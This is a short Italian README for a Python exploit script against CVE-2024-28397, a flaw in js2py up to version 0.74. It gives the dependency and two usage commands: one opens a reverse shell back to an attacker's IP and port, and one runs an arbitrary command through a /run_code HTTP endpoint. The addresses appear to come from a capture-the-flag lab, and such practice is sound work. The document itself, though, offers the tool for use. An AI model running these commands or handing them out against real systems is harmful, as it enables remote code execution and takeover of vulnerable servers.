
Script di exploit in Python per CVE-2024-28397 che mira a js2py <= v0.74. Supporta reverse shell ed esecuzione di comandi personalizzati tramite endpoint HTTP.
Payload di reverse shell predefinito e argomento di comando opzionale consentiti
exploit funziona per js2py <= v0.74
requests (pip install requests)Reverse shell:
python exploit.py 10.129.227.108 /run_code --local_ip 10.10.14.71 --local_port 4444
Comando personalizzato:
python exploit.py 10.129.227.108 /run_code --cmd "id"